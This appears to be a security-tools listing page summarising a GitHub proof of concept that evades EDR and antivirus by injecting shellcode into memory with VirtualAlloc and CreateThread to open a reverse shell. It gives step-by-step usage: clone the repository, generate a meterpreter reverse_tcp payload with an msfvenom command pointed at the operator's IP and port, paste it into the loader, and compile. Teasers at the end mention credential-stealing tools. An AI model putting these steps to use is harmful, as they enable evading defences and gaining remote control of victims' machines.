This repository contains a proof-of-concept (PoC) for bypassing EDR and antivirus solutions using a memory injection technique.
The code executes shellcode that spawns a reverse shell, successfully evading detection by various security mechanisms.
This project demonstrates how to bypass EDR and antivirus protection using Windows API functions such as VirtualAlloc
, CreateThread
, and WaitForSingleObject
.
The payload is injected directly into the process memory without being detected by security tools, establishing a connection to a remote system for a reverse shell.
VirtualAlloc
and CreateThread
to inject the payload directly into process memoryhttps://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access.git
cd EDR-Antivirus-Bypass-Shell-Access
Before compiling, ensure that you modify the shellcode to point to your own IP address and port for the reverse shell. You can generate shellcode using msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f csharp
Replace the byte[] buf
section in Program.cs with the shellcode you just generated.
Open the project in Visual Studio, or use the following command to compile the code using the .NET SDK:
csc loader.cs
**Alternatively, you can compile in Release mode for better optimization:
csc -optimize loader.cs
For more information click here.
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…